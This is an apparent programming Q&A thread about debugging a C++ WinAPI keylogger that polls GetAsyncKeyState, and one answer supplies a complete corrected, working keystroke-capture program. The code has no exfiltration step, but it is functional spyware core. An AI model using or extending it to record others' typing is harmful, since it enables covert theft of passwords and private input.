# keylogger returns all values

Tags: c++, winapi, keylogger

I am setting up a keylogger, but not for malicious purposes.

Whenever I press a key after applying the `switch` statement to capture specific Virtual Key codes, my buffer gets completely filled with every number, letter, symbol etc.. that I filtered. It seems that, for some reason, whenever I press a key all of the `switch` statement's `case`s get hit. How do I fix it? Here is a screenshot below to make you visualize the problem:

[image]

file: main.cpp

```cpp
while(true)
{
    char key;
    for (key = 8; key <= 255; key++)
    {
        Api._Sleep(20);

        char _log[MAX_PATH];
            
        KL::Log(key, _log);
            
        Api._lstrcatA(_log, &key);
        int len = Api._lstrlenA(_log);
        if(len == MAX_PATH)
        {
            //dump routine
            memset(_log, 0, sizeof(_log));
        }
    }  
}
```

file: keylogger.cpp

```cpp
void KL::Log(char key, char* logvar)
{
    if (GetAsyncKeyState(key) == -32767)
    {
        bool shift_down = GetAsyncKeyState(VK_SHIFT);
        switch (key)
        {
            case 0x08: logvar[lstrlenA(logvar) - 1] = '\0';
                break;
            case 0x09: lstrcatA(logvar, "[TAB]");
                break;
            case 0x0D: lstrcatA(logvar, "[NEWLINE]");
                break;
            case 0x13: lstrcatA(logvar, "[PAUSE]");
                break;
            case 0x14: lstrcatA(logvar, "[CAPS LOCK]");
                break;
            case 0x20: lstrcatA(logvar, " ");
                break;
            case 0x25: lstrcatA(logvar, "[LARROW]");
                break;
            case 0x26: lstrcatA(logvar, "[UPARROW]");
                break;
            case 0x27: lstrcatA(logvar, "[RARROW]");
                break;
            case 0x28: lstrcatA(logvar, "[DARROW]");
                break;
            case 0x2E: lstrcatA(logvar, "[DELETE]");
                break;
            case 0x30: (!shift_down) ? lstrcatA(logvar, "0") : lstrcatA(logvar, ")");
                break;
            case 0x31: (!shift_down) ? lstrcatA(logvar, "1") : lstrcatA(logvar, "!");
                break;
            case 0x32: (!shift_down) ? lstrcatA(logvar, "2") : lstrcatA(logvar, "@");
                break;
            case 0x33: (!shift_down) ? lstrcatA(logvar, "3") : lstrcatA(logvar, "#");
                break;
            case 0x34: (!shift_down) ? lstrcatA(logvar, "4") : lstrcatA(logvar, "$");
                break;
            case 0x35: (!shift_down) ? lstrcatA(logvar, "5") : lstrcatA(logvar, "%");
                break;
            case 0x36: (!shift_down) ? lstrcatA(logvar, "6") : lstrcatA(logvar, "^");
                break;
            case 0x37: (!shift_down) ? lstrcatA(logvar, "7") : lstrcatA(logvar, "&");
                break;
            case 0x38: (!shift_down) ? lstrcatA(logvar, "8") : lstrcatA(logvar, "*");
                break;
            case 0x39: (!shift_down) ? lstrcatA(logvar, "9") : lstrcatA(logvar, "(");
                break;
            case 0x41: (!shift_down) ? lstrcatA(logvar, "a") : lstrcatA(logvar, "A");
                break;
            case 0x42: (!shift_down) ? lstrcatA(logvar, "b") : lstrcatA(logvar, "B");
                break;
            case 0x43: (!shift_down) ? lstrcatA(logvar, "c") : lstrcatA(logvar, "C");
                break;
            case 0x44: (!shift_down) ? lstrcatA(logvar, "d") : lstrcatA(logvar, "D");
                break;
            case 0x45: (!shift_down) ? lstrcatA(logvar, "e") : lstrcatA(logvar, "E");
                break;
            case 0x46: (!shift_down) ? lstrcatA(logvar, "f") : lstrcatA(logvar, "F");
                break;
            case 0x47: (!shift_down) ? lstrcatA(logvar, "g") : lstrcatA(logvar, "G");
                break;
            case 0x48: (!shift_down) ? lstrcatA(logvar, "h") : lstrcatA(logvar, "H");
                break;
            case 0x49: (!shift_down) ? lstrcatA(logvar, "i") : lstrcatA(logvar, "I");
                break;
            case 0x4A: (!shift_down) ? lstrcatA(logvar, "j") : lstrcatA(logvar, "J");
                break;
            case 0x4B: (!shift_down) ? lstrcatA(logvar, "k") : lstrcatA(logvar, "K");
                break;
            case 0x4C: (!shift_down) ? lstrcatA(logvar, "l") : lstrcatA(logvar, "L");
                break;
            case 0x4D: (!shift_down) ? lstrcatA(logvar, "m") : lstrcatA(logvar, "M");
                break;
            case 0x4E: (!shift_down) ? lstrcatA(logvar, "n") : lstrcatA(logvar, "N");
                break;
            case 0x4F: (!shift_down) ? lstrcatA(logvar, "o") : lstrcatA(logvar, "O");
                break;
            case 0x50: (!shift_down) ? lstrcatA(logvar, "p") : lstrcatA(logvar, "P");
                break;
            case 0x51: (!shift_down) ? lstrcatA(logvar, "q") : lstrcatA(logvar, "Q");
                break;
            case 0x52: (!shift_down) ? lstrcatA(logvar, "r") : lstrcatA(logvar, "R");
                break;
            case 0x53: (!shift_down) ? lstrcatA(logvar, "s") : lstrcatA(logvar, "S");
                break;
            case 0x54: (!shift_down) ? lstrcatA(logvar, "t") : lstrcatA(logvar, "T");
                break;
            case 0x55: (!shift_down) ? lstrcatA(logvar, "u") : lstrcatA(logvar, "U");
                break;
            case 0x56: (!shift_down) ? lstrcatA(logvar, "v") : lstrcatA(logvar, "V");
                break;
            case 0x57: (!shift_down) ? lstrcatA(logvar, "w") : lstrcatA(logvar, "W");
                break;
            case 0x58: (!shift_down) ? lstrcatA(logvar, "x") : lstrcatA(logvar, "X");
                break;
            case 0x59: (!shift_down) ? lstrcatA(logvar, "y") : lstrcatA(logvar, "Y");
                break;
            case 0x5A: (!shift_down) ? lstrcatA(logvar, "z") : lstrcatA(logvar, "Z");
                break;
            case 0x60: (!shift_down) ? lstrcatA(logvar, "0") : lstrcatA(logvar, "0");
                break;
            case 0x61: (!shift_down) ? lstrcatA(logvar, "1") : lstrcatA(logvar, "1");
                break;
            case 0x62: (!shift_down) ? lstrcatA(logvar, "2") : lstrcatA(logvar, "2");
                break;
            case 0x63: (!shift_down) ? lstrcatA(logvar, "3") : lstrcatA(logvar, "3");
                break;
            case 0x64: (!shift_down) ? lstrcatA(logvar, "4") : lstrcatA(logvar, "4");
                break;
            case 0x65: (!shift_down) ? lstrcatA(logvar, "5") : lstrcatA(logvar, "5");
                break;
            case 0x66: (!shift_down) ? lstrcatA(logvar, "6") : lstrcatA(logvar, "6");
                break;
            case 0x67: (!shift_down) ? lstrcatA(logvar, "7") : lstrcatA(logvar, "7");
                break;
            case 0x68: (!shift_down) ? lstrcatA(logvar, "8") : lstrcatA(logvar, "8");
                break;
            case 0x69: (!shift_down) ? lstrcatA(logvar, "9") : lstrcatA(logvar, "9");
                break;
            case 0x6A: (!shift_down) ? lstrcatA(logvar, "*") : lstrcatA(logvar, "*");
                break;
            case 0x6B: (!shift_down) ? lstrcatA(logvar, "+") : lstrcatA(logvar, "+");
                break;
            case 0x6D: (!shift_down) ? lstrcatA(logvar, "-") : lstrcatA(logvar, "-");
                break;
            case 0x6E: (!shift_down) ? lstrcatA(logvar, ".") : lstrcatA(logvar, ".");
                break;
            case 0x6F: (!shift_down) ? lstrcatA(logvar, "/") : lstrcatA(logvar, "/");
                break;
            case 0xBA: (!shift_down) ? lstrcatA(logvar, ";") : lstrcatA(logvar, ":");
                break;
            case 0xBB: (!shift_down) ? lstrcatA(logvar, "=") : lstrcatA(logvar, "+");
                break;
            case 0xBC: (!shift_down) ? lstrcatA(logvar, ",") : lstrcatA(logvar, "<");
                break;
            case 0xBD: (!shift_down) ? lstrcatA(logvar, "-") : lstrcatA(logvar, "_");
                break;
            case 0xBE: (!shift_down) ? lstrcatA(logvar, ".") : lstrcatA(logvar, ">");
                break;
            case 0xBF: (!shift_down) ? lstrcatA(logvar, "/") : lstrcatA(logvar, "?");
                break;
            case 0xC0: (!shift_down) ? lstrcatA(logvar, "`") : lstrcatA(logvar, "~");
                break;
            case 0xDB: (!shift_down) ? lstrcatA(logvar, "[") : lstrcatA(logvar, "{");
                break;
            case 0xDC: (!shift_down) ? lstrcatA(logvar, "\\") : lstrcatA(logvar, "|");
                break;
            case 0xDD: (!shift_down) ? lstrcatA(logvar, "]") : lstrcatA(logvar, "}");
                break;
            case 0xDE: (!shift_down) ? lstrcatA(logvar, "'") : lstrcatA(logvar, "\"");
                break;
        }
    }
}
```

Comment: Too many unknowns to be sure,  but it doesn't look like `_log` is being null -terminated.

Comment: `&key` is not a null-terminated string, so `Api._lstrcatA(_log, &key);` will not work.  You would need to use `char buf[2] = {key, '\0'}; Api._lstrcatA(_log, buf);` instead.

Comment: @RemyLebeau i did that and im still getting the same output :/

Comment: @pillpopper228 I didn't say it would fix your output, only that it was a bug.

Comment: Why are you checking for `GetAsyncKeyState()` for `-32767` only?  You do realize what that represents, don't you? Did you read the documentation, which says: "*The behavior of the least significant bit of the return value is retained strictly for compatibility with 16-bit Windows applications (which are non-preemptive) and should not be relied upon.*" If you really want to detect key presses, you shouldn't be polling the keys at all.  Use a keyboard hook via `SetWindowsHookEx()` or `RegisterRawInputDevices()` and let the hook notify you of each key press.

Comment: Even if you don't press a key, you still use `Api._lstrcatA(_log, &key);` to splice the key into `_log` instead of just writing the detected key.

Answer (score 0):

`_log` is getting redeclared on every iteration of the loop. So each `strcat` operation is just going to overwrite whatever was there before. But that's moot because `_log` isn't initialized to an empty string either.  I'm guessing you meant to declare `_log` as a class member variable instead of a local variable.

Change this:

```
while(true)
{
    char key;
    for (key = 8; key <= 255; key++)
    {
        Api._Sleep(20);

        char _log[MAX_PATH];
        
        KL::Log(key, _log);
        
        Api._lstrcatA(_log, &key);
        int len = Api._lstrlenA(_log);
        if(len == MAX_PATH)
        {
            //dump routine
            memset(_log, 0, sizeof(_log));
        }
    }  
}
```

To this:

```
char _log[MAX_PATH] = {0}; // zero-init
// OR THIS if _log is a class variable: 
// memset(_log, '\0', sizeof(_log));

while(true)
{
    char key;
    for (key = 8; key <= 255; key++)
    {
        Api._Sleep(20);

       
        KL::Log(key, _log);
        
        Api._lstrcatA(_log, &key);
        int len = Api._lstrlenA(_log);
        if(len == MAX_PATH)
        {
            //dump routine
            memset(_log, 0, sizeof(_log));
        }
    }  
}
```

Not sure why you have a 20ms sleep statement in the middle of each loop iteration.

Comment: i did sleep(20) cuz it greatly reduces cpu usage, however i tried null-terminating ```key``` and nothing changed, even after i put _log outside the while true loop, i still get the same messagebox with weird symbols including all letters numbers etc as the output

Comment: You have shown code that fills `_log`, but where is the code that actually displays it?

Answer (score 0):

First, you should declare `_log` outside the while loop (it can be global or local, it depends on your needs).

Then you shouldn't use `Api._lstrlenA(_log);` to write the value of `key` every time, this will make your `_log` record all the values.

You should not use `Api._Sleep(20);`, because this will affect the judgment of the keyboard press. When the key is pressed, it is likely that the current `key` value is different from the pressed key value, and sleep After that, the program missed the key.

Here is the modified sample, it worked for me:

```
#include <iostream>
#include <windows.h>
using namespace std;
void Log(char key, char* logvar)
{
    if (GetAsyncKeyState(key) & 0x01)
    {
        bool shift_down = GetAsyncKeyState(VK_SHIFT);
        switch (key)
        {
        case 0x08: logvar[lstrlenA(logvar) - 1] = '\0';
            break;
        case 0x09: lstrcatA(logvar, "[TAB]");
            break;
        case 0x0D: lstrcatA(logvar, "[NEWLINE]");
            break;
        case 0x13: lstrcatA(logvar, "[PAUSE]");
            break;
        case 0x14: lstrcatA(logvar, "[CAPS LOCK]");
            break;
        case 0x20: lstrcatA(logvar, " ");
            break;
        case 0x25: lstrcatA(logvar, "[LARROW]");
            break;
        case 0x26: lstrcatA(logvar, "[UPARROW]");
            break;
        case 0x27: lstrcatA(logvar, "[RARROW]");
            break;
        case 0x28: lstrcatA(logvar, "[DARROW]");
            break;
        case 0x2E: lstrcatA(logvar, "[DELETE]");
            break;
        case 0x30: (!shift_down) ? lstrcatA(logvar, "0") : lstrcatA(logvar, ")");
            break;
        case 0x31: (!shift_down) ? lstrcatA(logvar, "1") : lstrcatA(logvar, "!");
            break;
        case 0x32: (!shift_down) ? lstrcatA(logvar, "2") : lstrcatA(logvar, "@");
            break;
        case 0x33: (!shift_down) ? lstrcatA(logvar, "3") : lstrcatA(logvar, "#");
            break;
        case 0x34: (!shift_down) ? lstrcatA(logvar, "4") : lstrcatA(logvar, "$");
            break;
        case 0x35: (!shift_down) ? lstrcatA(logvar, "5") : lstrcatA(logvar, "%");
            break;
        case 0x36: (!shift_down) ? lstrcatA(logvar, "6") : lstrcatA(logvar, "^");
            break;
        case 0x37: (!shift_down) ? lstrcatA(logvar, "7") : lstrcatA(logvar, "&");
            break;
        case 0x38: (!shift_down) ? lstrcatA(logvar, "8") : lstrcatA(logvar, "*");
            break;
        case 0x39: (!shift_down) ? lstrcatA(logvar, "9") : lstrcatA(logvar, "(");
            break;
        case 0x41: (!shift_down) ? lstrcatA(logvar, "a") : lstrcatA(logvar, "A");
            break;
        case 0x42: (!shift_down) ? lstrcatA(logvar, "b") : lstrcatA(logvar, "B");
            break;
        case 0x43: (!shift_down) ? lstrcatA(logvar, "c") : lstrcatA(logvar, "C");
            break;
        case 0x44: (!shift_down) ? lstrcatA(logvar, "d") : lstrcatA(logvar, "D");
            break;
        case 0x45: (!shift_down) ? lstrcatA(logvar, "e") : lstrcatA(logvar, "E");
            break;
        case 0x46: (!shift_down) ? lstrcatA(logvar, "f") : lstrcatA(logvar, "F");
            break;
        case 0x47: (!shift_down) ? lstrcatA(logvar, "g") : lstrcatA(logvar, "G");
            break;
        case 0x48: (!shift_down) ? lstrcatA(logvar, "h") : lstrcatA(logvar, "H");
            break;
        case 0x49: (!shift_down) ? lstrcatA(logvar, "i") : lstrcatA(logvar, "I");
            break;
        case 0x4A: (!shift_down) ? lstrcatA(logvar, "j") : lstrcatA(logvar, "J");
            break;
        case 0x4B: (!shift_down) ? lstrcatA(logvar, "k") : lstrcatA(logvar, "K");
            break;
        case 0x4C: (!shift_down) ? lstrcatA(logvar, "l") : lstrcatA(logvar, "L");
            break;
        case 0x4D: (!shift_down) ? lstrcatA(logvar, "m") : lstrcatA(logvar, "M");
            break;
        case 0x4E: (!shift_down) ? lstrcatA(logvar, "n") : lstrcatA(logvar, "N");
            break;
        case 0x4F: (!shift_down) ? lstrcatA(logvar, "o") : lstrcatA(logvar, "O");
            break;
        case 0x50: (!shift_down) ? lstrcatA(logvar, "p") : lstrcatA(logvar, "P");
            break;
        case 0x51: (!shift_down) ? lstrcatA(logvar, "q") : lstrcatA(logvar, "Q");
            break;
        case 0x52: (!shift_down) ? lstrcatA(logvar, "r") : lstrcatA(logvar, "R");
            break;
        case 0x53: (!shift_down) ? lstrcatA(logvar, "s") : lstrcatA(logvar, "S");
            break;
        case 0x54: (!shift_down) ? lstrcatA(logvar, "t") : lstrcatA(logvar, "T");
            break;
        case 0x55: (!shift_down) ? lstrcatA(logvar, "u") : lstrcatA(logvar, "U");
            break;
        case 0x56: (!shift_down) ? lstrcatA(logvar, "v") : lstrcatA(logvar, "V");
            break;
        case 0x57: (!shift_down) ? lstrcatA(logvar, "w") : lstrcatA(logvar, "W");
            break;
        case 0x58: (!shift_down) ? lstrcatA(logvar, "x") : lstrcatA(logvar, "X");
            break;
        case 0x59: (!shift_down) ? lstrcatA(logvar, "y") : lstrcatA(logvar, "Y");
            break;
        case 0x5A: (!shift_down) ? lstrcatA(logvar, "z") : lstrcatA(logvar, "Z");
            break;
        case 0x60: (!shift_down) ? lstrcatA(logvar, "0") : lstrcatA(logvar, "0");
            break;
        case 0x61: (!shift_down) ? lstrcatA(logvar, "1") : lstrcatA(logvar, "1");
            break;
        case 0x62: (!shift_down) ? lstrcatA(logvar, "2") : lstrcatA(logvar, "2");
            break;
        case 0x63: (!shift_down) ? lstrcatA(logvar, "3") : lstrcatA(logvar, "3");
            break;
        case 0x64: (!shift_down) ? lstrcatA(logvar, "4") : lstrcatA(logvar, "4");
            break;
        case 0x65: (!shift_down) ? lstrcatA(logvar, "5") : lstrcatA(logvar, "5");
            break;
        case 0x66: (!shift_down) ? lstrcatA(logvar, "6") : lstrcatA(logvar, "6");
            break;
        case 0x67: (!shift_down) ? lstrcatA(logvar, "7") : lstrcatA(logvar, "7");
            break;
        case 0x68: (!shift_down) ? lstrcatA(logvar, "8") : lstrcatA(logvar, "8");
            break;
        case 0x69: (!shift_down) ? lstrcatA(logvar, "9") : lstrcatA(logvar, "9");
            break;
        case 0x6A: (!shift_down) ? lstrcatA(logvar, "*") : lstrcatA(logvar, "*");
            break;
        case 0x6B: (!shift_down) ? lstrcatA(logvar, "+") : lstrcatA(logvar, "+");
            break;
        case 0x6D: (!shift_down) ? lstrcatA(logvar, "-") : lstrcatA(logvar, "-");
            break;
        case 0x6E: (!shift_down) ? lstrcatA(logvar, ".") : lstrcatA(logvar, ".");
            break;
        case 0x6F: (!shift_down) ? lstrcatA(logvar, "/") : lstrcatA(logvar, "/");
            break;
        case 0xBA: (!shift_down) ? lstrcatA(logvar, ";") : lstrcatA(logvar, ":");
            break;
        case 0xBB: (!shift_down) ? lstrcatA(logvar, "=") : lstrcatA(logvar, "+");
            break;
        case 0xBC: (!shift_down) ? lstrcatA(logvar, ",") : lstrcatA(logvar, "<");
            break;
        case 0xBD: (!shift_down) ? lstrcatA(logvar, "-") : lstrcatA(logvar, "_");
            break;
        case 0xBE: (!shift_down) ? lstrcatA(logvar, ".") : lstrcatA(logvar, ">");
            break;
        case 0xBF: (!shift_down) ? lstrcatA(logvar, "/") : lstrcatA(logvar, "?");
            break;
        case 0xC0: (!shift_down) ? lstrcatA(logvar, "`") : lstrcatA(logvar, "~");
            break;
        case 0xDB: (!shift_down) ? lstrcatA(logvar, "[") : lstrcatA(logvar, "{");
            break;
        case 0xDC: (!shift_down) ? lstrcatA(logvar, "\\") : lstrcatA(logvar, "|");
            break;
        case 0xDD: (!shift_down) ? lstrcatA(logvar, "]") : lstrcatA(logvar, "}");
            break;
        case 0xDE: (!shift_down) ? lstrcatA(logvar, "'") : lstrcatA(logvar, "\"");
            break;
        }
    }
}
int main(int argc, const char* argv[])
{
    char _log[MAX_PATH]{};
    while (true)
    {
        char key;
        for (key = 8; key <= 255; key++)
        {
            //Sleep(20);
            Log(key, _log);
            //char buf[2] = { key, '\0' };
            //lstrcatA(_log, buf);
            int len = lstrlenA(_log);
            if (len == MAX_PATH)
            {
                //dump routine
                memset(_log, 0, sizeof(_log));
            }
        }
    }
    return 0;
}
```

Of course, this will cause the CPU occupancy problem you mentioned, so it is recommended that you use `SetWindowsHook` to achieve key logging.

You can refer to this thread:[C++/Win32: Keyboard input to a non-foreground window](https://stackoverflow.com/questions/65210101/c-win32-keyboard-input-to-a-non-foreground-window/65210238#65210238)